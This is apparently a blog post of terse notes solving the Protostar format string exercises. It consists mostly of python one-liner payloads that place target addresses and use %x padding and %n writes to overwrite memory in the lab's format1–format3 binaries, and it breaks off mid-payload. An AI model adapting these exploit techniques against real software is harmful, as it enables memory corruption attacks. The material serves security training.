Showing posts from December, 2016

Exploit Exercises - Format String

Format1:

Padding to last mem dump:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x

Write:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n

DMA:
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`

Format2: need to write a value to an address.

POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo

|Address|Value|Padding|%n

DMA:
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 bytes to a specified address.

POC:
python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\